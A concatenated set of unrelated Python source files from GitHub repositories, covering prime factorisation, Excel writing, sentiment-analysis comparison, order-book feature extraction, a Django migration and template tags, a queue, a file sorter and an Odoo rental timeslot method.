    for num in range(2, int(math.sqrt(n)) + 1):
        if n % num == 0:
            return False
    return True
def prime_factors(n):
    """Format n's prime factorisation as "(p)" / "(p**k)" terms.

    e.g. prime_factors(1245) -> "(3)(5)(83)", prime_factors(12) -> "(2**2)(3)".
    """
    if n == 1:
        return "(1)"
    terms = ""
    remaining = n
    for factor in range(2, n):
        exponent = 0
        while remaining % factor == 0:
            exponent += 1
            remaining = int(remaining / factor)
        if exponent > 1:
            terms += "({}**{})".format(factor, exponent)
        elif exponent == 1:
            terms += "({})".format(factor)
        if remaining == 1:
            return terms
        # Inlined trial-division primality check (the original delegated
        # to a sibling is_prime helper).
        if all(remaining % d != 0 for d in range(2, int(math.sqrt(remaining)) + 1)):
            return terms + "({})".format(remaining)
    return terms if terms else "({})".format(n)
print(prime_factors(1245)) | RealMrSnuggles/Python | CodeWars/Primes in numbers.py | Primes in numbers.py | py | 743 | python | en | code | 0 | github-code | 13 |
37844902665 |
import openpyxl
def excel_writer(data, path):
# data: {sheet_name: tuple of tuple(rows)}
wb = openpyxl.Workbook()
for sheet_name in data:
ws = wb.create_sheet(sheet_name)
for row in data[sheet_name]:
ws.append(row)
del wb["Sheet"]
wb.save(path)
data = {"sheet1": ((1,2),(3,4))}
out_dir = "test.xlsx"
excel_writer(data, out_dir) | RoyalSkye/AGH | Improvement_based/decomposition_cplex/excel_test.py | excel_test.py | py | 378 | python | en | code | 13 | github-code | 13 |
26135171161 | from textblob import TextBlob
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from pycorenlp import StanfordCoreNLP
from helper_functions import *
import pickle
import logging
from time import time
from multiprocessing.dummy import Pool as ThreadPool
from AOP import *
import unittest
'''
install:
pip install wget
pip install pycorenlp
wget http://nlp.stanford.edu/software/stanford-corenlp-full-2016-10-31.zip
unzip stanford-corenlp-full-2016-10-31.zip
source: http://stackoverflow.com/questions/32879532/stanford-nlp-for-python
start server cmd:
cd C:\Windows\System32\corenlp-python\stanford-corenlp-full-2016-10-31
java -mx5g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9001
'''
core_nlp = StanfordCoreNLP('http://localhost:9001')
def get_sentiment_coreNLP(text, print_result=False, core_nlp= core_nlp):
    """Per-sentence CoreNLP sentiment, scaled from the server's 0-4 to 0.0-1.0.

    Returns a single float when the text is one sentence, otherwise a list
    (asymmetric return type; callers must handle both).
    """
    res = core_nlp.annotate(text,
                   properties={
                       'annotators': 'sentiment',
                       'outputFormat': 'json',
                       'timeout': 100,
                   })
    sentiments = []
    for s in res["sentences"]:
        score = float(s["sentimentValue"])/4
        sentiments.append(score)
    if len(sentiments) == 1:
        return sentiments[0]
    if print_result:
        for s in res["sentences"]:
            print ("%d: '%s': %s %s" % (
                s["index"],
                " ".join([t["word"] for t in s["tokens"]]),
                s["sentimentValue"], s["sentiment"]))
    return sentiments
def get_sentence_sentiment_coreNLP(text, core_nlp= core_nlp):
    """Split `text` into sentences and return [sentence, rating] pairs,
    where rating is the raw CoreNLP sentimentValue (0-4)."""
    res = core_nlp.annotate(text,
                   properties={
                       'annotators': 'sentiment',
                       'outputFormat': 'json',
                       'timeout': 10000,
                   })
    sentence_sentiments = []
    # The stray debug print(res["sentences"]) ran OUTSIDE the try and crashed
    # with KeyError on timeout responses (the server returns a plain string).
    try:
        for s in res["sentences"]:
            sentence = " ".join([t["word"] for t in s["tokens"]])
            sentence_sentiments.append([sentence, int(s["sentimentValue"])])
    except Exception:
        # logging.warn is a deprecated alias for logging.warning.
        logging.warning('failed to get sentiment value for text: %s', text)
    return sentence_sentiments
def get_average_sentiment_coreNLP(text, core_nlp= core_nlp):
    """Mean sentence sentiment in [0, 1]; returns neutral 0.5 on any failure."""
    try:
        res = core_nlp.annotate(text,
                       properties={
                           'annotators': 'tokenize,ssplit,sentiment',
                           'outputFormat': 'json',
                           'timeout': 100000,
                       })
        sentiments = []
        for s in res["sentences"]:
            # NOTE(review): `sentence` is built but never used.
            sentence = []
            for token in s["tokens"]:
                sentence.append(token['word'])
            score = float(s["sentimentValue"])/4
            sentiments.append(score)
        return sum(sentiments) / len(sentiments)
    except Exception:
        # Covers server errors and empty sentence lists (ZeroDivisionError).
        return 0.5
def get_senitment_textblob(text):
    """TextBlob polarity mapped from [-1, 1] to [0, 1]. (Name typo kept for callers.)"""
    testimonial = TextBlob(text)
    return (testimonial.sentiment.polarity+1) / 2
def get_sentiment_vader(text):
    """VADER proportions folded to [0, 1]: neutral weighs 0.5, positive 1, negative 0."""
    vaderAnalyzer = SentimentIntensityAnalyzer()
    scores = vaderAnalyzer.polarity_scores(text)
    #dictkeys: neg(negative), neu(neutral) and pos(positive)
    return scores["neu"] * 0.5 + scores["pos"]
def get_dict_acc(dictionary):
    """Ratio of summed hits to summed totals over all entries, rounded to 4 dp.

    Each value is a [hit_count, total_count] pair.
    """
    hits = sum(pair[0] for pair in dictionary.values())
    totals = sum(pair[1] for pair in dictionary.values())
    return round(hits / totals, 4)
@timing
def compare_sentiment_analysis(reviews, business_id2business, output_file = "data/compare_sentiment_analysis.txt"):
    """Score every review with TextBlob, VADER and CoreNLP, and append
    per-business accuracy (within 0.125 of the star rating mapped to [0,1])
    and mean absolute error to `output_file` as a tab-separated table.

    NOTE(review): mutates `reviews` in place (reverse) and stops after one
    hour of wall-clock processing.
    """
    textblob2acc = dict()
    vader2acc = dict()
    corenlp2acc = dict()
    textblob2error = dict()
    vader2error = dict()
    corenlp2error = dict()
    reviews.reverse()
    time1 = time()
    for review in reviews:
        if review["business_id"] not in textblob2acc:
            textblob2acc[review["business_id"]] = [0.0, 0]
            vader2acc[review["business_id"]] = [0.0, 0]
            corenlp2acc[review["business_id"]] = [0.0, 0]
            textblob2error[review["business_id"]] = [0.0, 0]
            vader2error[review["business_id"]] = [0.0, 0]
            corenlp2error[review["business_id"]] = [0.0, 0]
        textblob2acc[review["business_id"]][1] += 1
        vader2acc[review["business_id"]][1] += 1
        corenlp2acc[review["business_id"]][1] += 1
        textblob2error[review["business_id"]][1] += 1
        vader2error[review["business_id"]][1] += 1
        corenlp2error[review["business_id"]][1] += 1
        # Map 1-5 stars onto [0, 1] so it is comparable with the analyzers.
        score = (float(review["stars"]) - 1.0) / 4
        text = review["text"]
        textblob_score = get_senitment_textblob(text)
        if abs(score - textblob_score) <= 0.125:
            textblob2acc[review["business_id"]][0] += 1
        textblob2error[review["business_id"]][0] += abs(score - textblob_score)
        vader_score = get_sentiment_vader(text)
        if abs(score - vader_score) <= 0.125:
            vader2acc[review["business_id"]][0] += 1
        vader2error[review["business_id"]][0] += abs(score - vader_score)
        core_nlp_score = get_average_sentiment_coreNLP(text)
        if abs(score - core_nlp_score) <= 0.125:
            corenlp2acc[review["business_id"]][0] += 1
        corenlp2error[review["business_id"]][0] += abs(score - core_nlp_score)
        # One-hour processing budget.
        if (time() - time1) > 3600:
            break
    with open(output_file, "a") as f:
        accs = [textblob2acc, vader2acc, corenlp2acc,textblob2error,vader2error,corenlp2error]
        print_str = "Business Name\tTextblob Accuracy\tVader Accuracy\tCoreNLP Accuracy\tTextblob Error\tVader Error\tCoreNLP Error"
        print(print_str)
        f.write(print_str + "\n")
        for business_id in textblob2acc:
            if business_id not in business_id2business:
                continue
            print_str = business_id2business[business_id]["name"]
            for acc in accs:
                print_str+= "\t" + str(round(acc[business_id][0]/acc[business_id][1],4))
            print(print_str)
            f.write(print_str + "\n")
        print_str = "Overall"
        for acc in accs:
            print_str += "\t" + str(get_dict_acc(acc))
        print(print_str)
        f.write(print_str + "\n")
def add_sentences_to_reviews(reviews, port = 9000):
    """Annotate each review dict with per-sentence sentiment.

    `reviews` is a (review_list, port) pair — the per-thread slice produced by
    add_sentences_to_reviews_multithreaded. NOTE: the `port` parameter is kept
    for interface compatibility but the port actually used is reviews[1].
    """
    core_nlp = StanfordCoreNLP('http://localhost:' + str(reviews[1]))
    try:
        for review in reviews[0]:
            # The original's `review["sentences"] is []` was always False
            # (identity against a fresh list); use == to detect empty results.
            if "sentences" not in review or review["sentences"] == []:
                review["sentences"] = get_sentence_sentiment_coreNLP(review["text"], core_nlp = core_nlp)
    except Exception:
        # Best-effort: keep whatever was annotated before the failure.
        pass
    return reviews
@timing
def add_sentences_to_reviews_multithreaded(reviews,numberOfThreads = 4):
    """Split `reviews` across threads, one CoreNLP server port per slice (9001+i).

    NOTE(review): reviews beyond step*numberOfThreads are dropped by this split.
    """
    step = len(reviews) // numberOfThreads
    split_reviews = [(reviews[step * i:step * (i + 1)], i + 9001) for i in range(numberOfThreads)]
    pool = ThreadPool(numberOfThreads)
    results = pool.map(add_sentences_to_reviews, split_reviews)
    return results
def coreNLP_sentiment_by_word(text, average=False):
    """Word-level sentiment: annotate each (stemmed) word separately and
    aggregate a histogram over the 0-4 ratings.

    Returns the histogram mean when `average` is True, otherwise the modal
    rating; defaults to neutral 2 when no word could be scored.
    """
    words = process_words(text, "en", stem=True)
    ratings = [0] * 5
    for word in words:
        try:
            res = core_nlp.annotate(word,
                           properties={
                               'annotators': 'sentiment',
                               'outputFormat': 'json',
                               'timeout': 100,
                           })
            for s in res["sentences"]:
                ratings[int(s["sentimentValue"])] += 1
        except Exception:
            # Skip words the server cannot score (e.g. timeouts).
            pass
    if average:
        total = np.sum(ratings)
        if total == 0:
            return 2
        rating_average = 0.0
        for i in range(len(ratings)):
            rating_average += i * ratings[i]
        return rating_average/total
    else:
        return np.argmax(ratings)
class TddSentimentAnalysis(unittest.TestCase):
    """Sanity tests: at least one analyzer should stay within an average
    error of 0.7 stars on hand-labelled sentences (ratings on a 0-4 scale)."""
    def test_positive_sentences_classified_incorectly(self):
        # Sentences that analyzers tend to misjudge; (text, expected rating).
        sentences = [('''My favorite part about this property is the casino ,
        especially the poker room ,
        which is located right in front of the hotel ,
        and it 's big enough to accommodate enough people than almost all of the other poker rooms on the strip .''',3),
                     ("I heart this poker room and the casino here is HUGE !",4),
                     ("I stayed at the Aria after getting a great deal for a 2 night stay .",3),
                     ('''Our room looked out on the Vdara and not the strip ,
        but still provided a great view .''',3),
                     ("bathrooms - awesome .",4)]
        errors = [0.0] * 3
        for sentence in sentences:
            text = sentence[0]
            rating = sentence[1]
            # Analyzer outputs are in [0, 1]; *4 brings them to the 0-4 scale.
            textblob_score = get_senitment_textblob(text) * 4
            vader_score = get_sentiment_vader(text) * 4
            word_coreNLP = coreNLP_sentiment_by_word(text,average=True)
            errors[0] += abs(rating-textblob_score)
            errors[1] += abs(rating - vader_score)
            errors[2] += abs(rating - word_coreNLP)
        self.assertLess(np.min(errors),len(sentences)*0.7)

    def test_sentences_classified_corectly(self):
        sentences = [("pool area - meh .",2),
                     ("4 stars because the evening front desk was n't as helpful and the morning shift .",1),
                     ("Look maybe these things are small , but to have to stop and call the front the desk is annoying .",1),
                     ("Overall experience was very good .",4),
                     ("Aria has a tram that will take you over to the Bellagio .",3)]
        errors = [0.0] * 3
        for sentence in sentences:
            text = sentence[0]
            rating = sentence[1]
            textblob_score = get_senitment_textblob(text) * 4
            vader_score = get_sentiment_vader(text) * 4
            word_coreNLP = coreNLP_sentiment_by_word(text,average=True)
            errors[0] += abs(rating-textblob_score)
            errors[1] += abs(rating - vader_score)
            errors[2] += abs(rating - word_coreNLP)
        self.assertLess(np.min(errors), len(sentences) * 0.7)
if __name__ == '__main__':
    # Run the comparison over each pickled city/category dump first, then
    # hand control to unittest (which parses sys.argv).
    categories = ["Hotels"]
    for category in categories:
        print(category)
        with open("data/Las_Vegas-" + category + ".p", "rb") as f:
            all_reviews, business_id2business, user_id2user = pickle.load(f)
        compare_sentiment_analysis(all_reviews, business_id2business,"data/"+category+"_compare_sentiment_analysis.txt")
    unittest.main()
| AndreiIacob/SuperView | src/SentimentAnalysis.py | SentimentAnalysis.py | py | 11,071 | python | en | code | 1 | github-code | 13 |
40268625031 | from utils import time_to_int
import numpy as np
import os
import pandas as pd
import pdb
class FeatureExtractor:
    """Builds feature vectors (a basic order-book set plus time-insensitive
    derived features) and up/down labels from a limit-order-book Excel dump,
    caching the result as line-delimited JSON at `feature_filename`."""

    def __init__(self, limit_order_filename, feature_filename,
                 time_interval, n_level):
        self.limit_order_filename = limit_order_filename
        self.limit_order_df = None            # loaded lazily in extract_features
        self.feature_filename = feature_filename
        self.time_interval = time_interval    # sampling interval, same units as the Time column
        self.n_level = n_level                # order-book depth per snapshot
        self.delimiter_indices = []
        self.time_interval_indices = []

    def extract_features(self):
        """Extract features from limit order book (computing and caching them
        on first call; later calls just reload the JSON)."""
        if not os.path.isfile(self.feature_filename):
            self.limit_order_df = pd.read_excel(self.limit_order_filename)
            # index starting from the valid level
            self.delimiter_indices = self.get_delimiter_indices()
            print("len delimiter_indices", len(self.delimiter_indices))
            # index at the end of every interval
            self.time_interval_indices = (np.array(self.get_time_interval_indices()) - 1).tolist()
            basic_set, timestamps, mid_prices = self.extract_basic_set()
            time_insensitive_set = self.extract_time_insensitive_set(basic_set)
            labels = self.get_mid_price_labels(mid_prices)
            self.save_feature_json(self.feature_filename, timestamps, basic_set,
                                   time_insensitive_set, labels, mid_prices)
        df = pd.read_json(self.feature_filename, orient="records", lines="True")
        timestamps = df["timestamps"].tolist()
        basic_set = df["basic_set"].tolist()
        time_insensitive_set = df["time_insensitive_set"].tolist()
        labels = df["labels"].tolist()
        return np.array(timestamps), np.array(basic_set), \
               np.array(time_insensitive_set), np.array(labels)

    def extract_basic_set(self):
        """Extract basic set: per interval, the top n_level (ask_price,
        ask_size, bid_price, bid_size) rows flattened, the interval timestamp,
        and the max mid-price observed inside the interval."""
        limit_book_indices = np.array(self.delimiter_indices)[self.time_interval_indices].tolist()
        assert(len(limit_book_indices) > 0)
        timestamps = []
        basic_set = []
        mid_prices = []
        init_time = self.get_init_time(limit_book_indices)
        init_index = self.time_interval_indices[0]
        for i in limit_book_indices:
            timestamps.append(init_time)
            init_time = init_time + self.time_interval
            v1 = []
            for index in range(i + 1, i + 1 + self.n_level):
                v1.append([self.limit_order_df["ASK_PRICE"][index],
                           self.limit_order_df["ASK_SIZE"][index],
                           self.limit_order_df["BID_PRICE"][index],
                           self.limit_order_df["BID_SIZE"][index]])
            # append the max mid-price in the interval
            max_mid_price = 0
            while np.array(self.delimiter_indices)[init_index] <= i:
                max_mid_price = max(max_mid_price, (self.limit_order_df["ASK_PRICE"][np.array(self.delimiter_indices)[init_index]+1]\
                                + self.limit_order_df["BID_PRICE"][np.array(self.delimiter_indices)[init_index]+1])/2)
                init_index = init_index + 1
            mid_prices.append(max_mid_price)
            basic_set.append(np.array(v1).reshape(1, -1).tolist()[0])
        return basic_set, timestamps, mid_prices

    def extract_time_insensitive_set(self, basic_set):
        """Extract time insensitive features (v2..v5) from each basic vector."""
        time_insensitive_set = []
        for v1 in basic_set:
            v1 = np.array(v1).reshape(self.n_level, -1)
            v2 = self.get_time_insensitive_v2(v1)
            v3 = self.get_time_insensitive_v3(v1)
            v4 = self.get_time_insensitive_v4(v1)
            v5 = self.get_time_insensitive_v5(v1)
            time_insensitive_feature = v2 + v3 + v4 + v5
            time_insensitive_set.append(time_insensitive_feature)
        return time_insensitive_set

    def get_delimiter_indices(self):
        """Get all valid D's indices in the limit order book.

        A leading -1 stands for an implicit delimiter before row 0; the list
        is trimmed to start at the first state that has n_level valid levels.
        """
        delimiter_indices = [-1]  # assume there is a D before index 0
        for i in range(len(self.limit_order_df["DELIMITER"])):
            if self.limit_order_df["DELIMITER"][i] == "D":
                delimiter_indices.append(i)
        guarantee_index = self.check_n_level(delimiter_indices)
        return delimiter_indices[guarantee_index:-1]

    def check_n_level(self, delimiter_indices):
        """Find the first index in delimiter indices whose every following
        snapshot satisfies the desired book depth (n_level rows with both
        non-zero bid and ask size)."""
        guaranteed_index = 0
        for i in range(len(delimiter_indices) - 1):
            count = 0
            if delimiter_indices[i + 1] - delimiter_indices[i] < self.n_level:
                guaranteed_index = i + 1
                continue
            for index in range(delimiter_indices[i] + 1, delimiter_indices[i + 1]):
                if self.limit_order_df["BID_SIZE"][index] * self.limit_order_df["ASK_SIZE"][index] > 0:
                    count += 1
                    if count == self.n_level:
                        break
            else:
                # for/else: loop finished without the break, depth insufficient.
                if count < self.n_level:
                    guaranteed_index = i + 1
        print("guaranteed_index: ", guaranteed_index)
        return guaranteed_index

    def get_time_interval_indices(self):
        """Find all D's indices in delimiter indices at time-interval steps."""
        next_timestamp = self.get_start_timestamp()
        time_interval_indices = []
        current_index = 0
        while current_index != -1:
            time_interval_index = self.get_time_interval_index(next_timestamp, current_index)
            if time_interval_index == -1:
                break
            time_interval_indices.append(time_interval_index)
            current_index = time_interval_index
            next_timestamp += self.time_interval
        return time_interval_indices

    def get_time_interval_index(self, timestamp, current_index):
        """Find the first state at (or just before) the desired timestamp,
        scanning forward from current_index; -1 when past the end."""
        for i in range(current_index, len(self.delimiter_indices)):
            index = self.delimiter_indices[i] + 1
            try:
                current_timestamp = time_to_int(self.limit_order_df["Time"].iloc[index])
            except:
                # NOTE(review): aborts the whole process on a malformed row.
                print(self.delimiter_indices[i])
                print(index)
                exit(1)
            if current_timestamp == timestamp:
                return i
            elif current_timestamp > timestamp:
                return i - 1
        return -1

    def get_start_timestamp(self):
        """Find the first timestamp in int, rounded up to the next multiple
        of time_interval."""
        assert(len(self.delimiter_indices) > 0)
        guaranteed_index = self.delimiter_indices[0] + 1
        print("Start timestamp:", self.limit_order_df["Time"].iloc[guaranteed_index])
        guaranteed_timestamp = time_to_int(self.limit_order_df["Time"].iloc[guaranteed_index])
        if guaranteed_timestamp % self.time_interval == 0:
            start_timestamp = guaranteed_timestamp
        else:
            start_timestamp = self.time_interval * ((guaranteed_timestamp / self.time_interval) + 1)
        print("Start timestamp int:", start_timestamp)
        return start_timestamp

    def get_init_time(self, limit_book_indices):
        """First interval timestamp, aligned up to a multiple of time_interval."""
        if limit_book_indices[0] == -1:
            init_time_index = 0
        else:
            init_time_index = limit_book_indices[0]
        init_time = time_to_int(self.limit_order_df["Time"][init_time_index]) \
            if time_to_int(self.limit_order_df["Time"][init_time_index]) % self.time_interval == 0 \
            else self.time_interval * ((time_to_int(self.limit_order_df["Time"][init_time_index])
                                        / self.time_interval) + 1)
        return init_time

    @staticmethod
    def get_time_insensitive_v2(v1):
        """Get v2 from v1: per level, (spread, mid-price), flattened."""
        v2 = [[v1_i[0] - v1_i[2], (v1_i[0] + v1_i[2])/2] for v1_i in v1]
        return [var for v2_i in v2 for var in v2_i]

    @staticmethod
    def get_time_insensitive_v3(v1):
        """Get v3 from v1: ask/bid range vs level 0 plus |diffs| between
        adjacent levels, flattened."""
        v3 = [[v1[-1][0] - v1[0][0], v1[0][2] - v1[-1][2],
               abs(v1[i][0] - v1[i - 1][0]), abs(v1[i][2] - v1[i - 1][2])]
              for i in range(len(v1)) if i > 0]
        return [var for v3_i in v3 for var in v3_i]

    @staticmethod
    def get_time_insensitive_v4(v1):
        """Get v4 from v1: mean ask/bid price and mean ask/bid size."""
        p_ask = [v1_i[0] for v1_i in v1]
        v_ask = [v1_i[1] for v1_i in v1]
        p_bid = [v1_i[2] for v1_i in v1]
        v_bid = [v1_i[3] for v1_i in v1]
        return [sum(p_ask)/len(p_ask), sum(p_bid)/len(p_bid),
                sum(v_ask)/len(v_ask), sum(v_bid)/len(v_bid)]

    @staticmethod
    def get_time_insensitive_v5(v1):
        """Get v5 from v1: accumulated price and volume spreads."""
        p_ask_p_bid = [v1_i[0] - v1_i[2] for v1_i in v1]
        v_ask_v_bid = [v1_i[1] - v1_i[3] for v1_i in v1]
        return [sum(p_ask_p_bid), sum(v_ask_v_bid)]

    @staticmethod
    def get_mid_price_labels(mid_prices):
        """Get the labels: 1 when the mid-price rose vs the previous interval,
        else 0; the first label is fixed at 0."""
        gt = [0]  # let the start label be 0
        if len(mid_prices) == 1:
            return gt
        for i in range(1, len(mid_prices)):
            if mid_prices[i] - mid_prices[i - 1] > 0:
                gt.append(1)
            else:
                gt.append(0)
        return gt

    @staticmethod
    def save_feature_json(feature_filename, timestamps, basic_set,
                          time_insensitive_set, labels, mid_prices):
        """Save the json. Fix: the dict key was misspelled "mid_pices" while
        the DataFrame column list said "mid_prices", so the saved mid-price
        column was always empty."""
        feature_dict = {"timestamps": timestamps, "basic_set": basic_set,
                        "time_insensitive_set": time_insensitive_set,
                        "labels": labels, "mid_prices": mid_prices}
        df = pd.DataFrame(data=feature_dict, columns=["timestamps", "basic_set",
                                                      "time_insensitive_set",
                                                      "labels", "mid_prices"])
        df.to_json(path_or_buf=feature_filename, orient="records", lines=True)
| ChenZheng-Zero/OrderBook_ML | feature_extractor.py | feature_extractor.py | py | 9,994 | python | en | code | 1 | github-code | 13 |
1320650346 | '''
Your task is to convert a number between 1 and 31 to a sequence of actions in the secret handshake.
The sequence of actions is chosen by looking at the rightmost five digits of the number once it's been converted to binary. Start at the right-most digit and move left.
The actions for each number place are:
00001 = wink
00010 = double blink
00100 = close your eyes
01000 = jump
10000 = Reverse the order of the operations in the secret handshake.
'''
def commands(binary_str):
    """Translate a 5-character binary string into secret-handshake actions.

    Bits are read right to left (positions 4..1); the leftmost bit (position
    0) reverses the order of the resulting actions.
    """
    actions = ["wink", "double blink", "close your eyes", "jump"]
    result = [actions[4 - pos] for pos in range(4, 0, -1) if binary_str[pos] == "1"]
    if binary_str[0] == "1":
        result.reverse()
    return result
70872787857 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import django.core.validators
class Migration(migrations.Migration):
    """Initial schema migration: creates the ``UserProfile`` table."""

    dependencies = [
        # The profile references the (swappable) auth user model, so that
        # app's migrations must run first.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='UserProfile',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('fullName', models.CharField(max_length=50)),
                # Digits-only validation; the b'' literals suggest this file
                # was generated under Python 2.
                ('phoneNumber', models.CharField(blank=True, max_length=10, validators=[django.core.validators.RegexValidator(b'^[0-9]*$', b'Only 0-9 allowed', b'Invalid Number')])),
                ('website', models.URLField(verbose_name=b'Website', blank=True)),
                # unique=True on the FK makes this effectively one-to-one.
                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, unique=True)),
            ],
        ),
    ]
| bitsnbytes7c8/django-site | user_profile/migrations/0001_initial.py | 0001_initial.py | py | 973 | python | en | code | 0 | github-code | 13 |
5945187963 | #Dylan Miller
#Uses the TwoStack class to implement a queue where the first item
#in is the first one out
#imports the TwoStacks class
from Lab01TwoStacks import *
#creates a Queue class that can add items to the back of the queue
#and remove items from the front
class Queue(TwoStacks):
    """FIFO queue built on top of the TwoStacks class.

    Items are pushed onto stack 1; a dequeue temporarily pours stack 1 into
    stack 2 (reversing the order), pops the oldest item, then pours
    everything back.
    """

    def __init__(self, n):
        # maxLen mirrors TwoStacks: maximum combined size of both stacks.
        self.maxLen = n
        self.array = []   # backing list shared by both stacks
        self.len1 = 0     # current height of stack 1
        self.len2 = 0     # current height of stack 2

    def length(self):
        """Return the number of items currently in the queue."""
        # len() already returns an int, so no int() wrapper is needed.
        return len(self.array)

    def enqueue(self, item):
        """Add an item to the back of the queue."""
        self.push(1, item)

    def dequeue(self):
        """Remove and return the oldest item in the queue (O(n))."""
        # Pour stack 1 into stack 2, reversing the order so the oldest
        # item ends up on top of stack 2.
        for _ in range(self.height(1)):
            self.push(2, self.pop(1))
        item = self.pop(2)
        # Pour everything back so the queue is ready for the next operation.
        for _ in range(self.height(2)):
            self.push(1, self.pop(2))
        return item

    def __str__(self):
        # Matches the original format: every item followed by a space.
        return "".join(str(item) + " " for item in self.array)
| dylmill8/Python-Programming | ATCS/Lab01/Lab01Queue.py | Lab01Queue.py | py | 1,837 | python | en | code | 0 | github-code | 13 |
14095597448 | from django import template
from django.template.base import token_kwargs
from feincms3_cookiecontrol.embedding import embed, wrap
from feincms3_cookiecontrol.models import cookiecontrol_data
register = template.Library()
@register.inclusion_tag("feincms3_cookiecontrol/banner.html")
def feincms3_cookiecontrol(*, hide_modify_button=False, privacy_policy_url=None):
    """Render the cookie banner with the configured panel data."""
    panel = cookiecontrol_data(privacy_policy_url=privacy_policy_url)
    if hide_modify_button:
        # Removing the key hides the "modify" button in the template.
        panel.pop("buttonModify")
    return {"data": panel}
class ConsciousWrapNode(template.Node):
    """Template node that wraps its rendered children for a consent provider."""

    def __init__(self, provider, nodelist, kw):
        self.provider = template.Variable(provider)
        self.nodelist = nodelist
        self.kw = kw

    def render(self, context):
        # Resolve in the same order as before: provider, body, then kwargs.
        provider = self.provider.resolve(context)
        body = self.nodelist.render(context)
        resolved_kwargs = {
            name: variable.resolve(context) for name, variable in self.kw.items()
        }
        return wrap(provider, body, **resolved_kwargs)
@register.tag(name="wrap")
def do_wrap(parser, token):
try:
tag_name, provider, *bits = token.split_contents()
except ValueError as exc:
raise template.TemplateSyntaxError(
"%r tag requires exactly one argument", str(token.contents).split()[0]
) from exc
kw = token_kwargs(bits, parser)
nodelist = parser.parse(("endwrap",))
parser.delete_first_token()
return ConsciousWrapNode(provider, nodelist, kw)
@register.simple_tag(name="embed")
def do_embed(url):
return embed(url)
| feinheit/feincms3-cookiecontrol | feincms3_cookiecontrol/templatetags/feincms3_cookiecontrol.py | feincms3_cookiecontrol.py | py | 1,495 | python | en | code | 8 | github-code | 13 |
34608122595 | # Задание №7
# ✔ Создайте функцию для сортировки файлов по директориям:
# видео, изображения, текст и т.п.
# ✔ Каждая группа включает файлы с несколькими расширениями.
# ✔ В исходной папке должны остаться только те файлы,
# которые не подошли для сортировки
from string import ascii_lowercase, digits
from random import choices, randint
from os import path
import os
def check_dir(dir, **kwargs) -> None:
    # Create *dir* if needed, make it the current working directory, then
    # generate random files there (kwargs map extension -> file count).
    # NOTE(review): "dir" shadows the builtin, but renaming it would change
    # the keyword interface for callers, so it is kept.
    if not path.exists(dir):
        os.mkdir(dir)
    os.chdir(dir)
    make_exp(**kwargs)
def make_files(exp: str, min_name_len: int = 6, max_name_len: int = 30,
               min_size: int = 256, max_size: int = 4096, amount: int = 42) -> None:
    """Create *amount* files with extension *exp* and random names/contents.

    Names use lowercase letters, digits and underscores; sizes are drawn
    uniformly from [min_size, max_size] bytes.  Files are written to the
    current working directory.
    """
    alphabet = ascii_lowercase + digits + '_'
    for _ in range(amount):
        name_length = randint(min_name_len, max_name_len)
        file_name = ''.join(choices(alphabet, k=name_length))
        payload = bytes(randint(0, 255) for _ in range(randint(min_size, max_size)))
        with open(f'{file_name}.{exp}', mode='wb') as handle:
            handle.write(payload)
def make_exp(**kwargs):
    """Generate random files for every ``extension=amount`` pair given."""
    for extension, count in kwargs.items():
        make_files(exp=extension, amount=count)
def sort_files_by_directories():
    """Move every file in the CWD into a subdirectory named after its extension.

    Python source files (``.py``) and directories are left in place.
    """
    for entry in os.listdir():
        # Only sort regular files; skip the category directories themselves
        # (previously a pre-existing category directory would itself be
        # passed to os.replace).
        if not os.path.isfile(entry):
            continue
        extension = entry.split('.')[-1]
        # Keep Python sources in place.  The original used the substring
        # test ``extension in 'py'``, which wrongly skipped the one-letter
        # extensions "p" and "y" as well, and only protected .py files
        # until a "py" directory happened to exist.
        if extension == 'py':
            continue
        if not os.path.exists(extension):
            os.mkdir(extension)
        os.replace(entry, os.path.join(os.getcwd(), extension, entry))
# Demo run: create sample files (3 .mp3, 2 .avi, 1 .txt) in the CWD, then
# sort everything except Python sources into per-extension directories.
make_exp(mp3=3, avi=2, txt=1)
sort_files_by_directories()
32729168269 | import datetime
import dateutil
from odoo import _, models
class Product(models.Model):
    _inherit = "product.product"

    def can_rent(self, start_date, stop_date, qty=None):
        """Return whether *qty* units can be rented over the given period."""
        return self.env["website.rentals.scheduling"].can_rent(
            self, start_date, stop_date, qty=qty
        )

    def get_available_rental_qty(self, start_date, stop_date):
        """Return how many units are free to rent over the given period."""
        return self.env["website.rentals.scheduling"].get_available_qty(
            self, start_date, stop_date
        )

    def get_rental_hourly_timeslots(self, date=None):
        """
        Generates a set of timeslots for a certain time period based on this
        products rental pricing rules.

        The smallest interval, hourly pricing rule is used. For example, if a
        product has three rules for 1 hour, 2 hour, and 3 hours, then this is
        going to generate hourly time slots.

        :param date: date string to generate slots for; defaults to today.
        :return: list of "HH:MM" strings, or None when the product has no
            hourly pricing rule.
        """
        now = datetime.datetime.now()

        # ``date`` previously defaulted to None but was parsed
        # unconditionally, so calling without an argument raised a TypeError
        # inside dateutil.  Default to "now" instead.
        if date is None:
            date = now
        else:
            # Comparisons below are against naive datetimes, so drop tzinfo.
            date = dateutil.parser.parse(date).replace(tzinfo=None)

        if not self.rental_pricing_ids:
            return

        if "hour" not in self.mapped("rental_pricing_ids.unit"):
            return

        # Find the lowest-duration "hour" pricing rule.
        price_rule = self.env["rental.pricing"].search(
            [
                ("id", "in", self.rental_pricing_ids.ids),
                ("unit", "=", "hour")
            ],
            order="duration asc",
            limit=1,
        )

        # Break the day into segments of the rule's duration.  If the
        # smallest pricing rule is 2 hours, this yields 00:00, 02:00, ...
        timeslots = []
        current_timeslot = datetime.datetime(
            year=date.year,
            month=date.month,
            day=date.day,
            hour=0,
            minute=0,
            second=0
        )

        if price_rule.start_time:
            current_timeslot = current_timeslot.replace(
                hour=price_rule.start_time_hour,
                minute=price_rule.start_time_minutes,
            )

        if price_rule.end_time:
            date = date.replace(
                hour=price_rule.end_time_hour,
                minute=price_rule.end_time_minutes
            )

        while True:
            # Only offer slots that are still in the future.
            if current_timeslot > now:
                timeslots.append(current_timeslot.strftime("%H:%M"))

            current_timeslot += datetime.timedelta(hours=price_rule.duration)
            if current_timeslot > date:
                break

        return timeslots
return timeslots
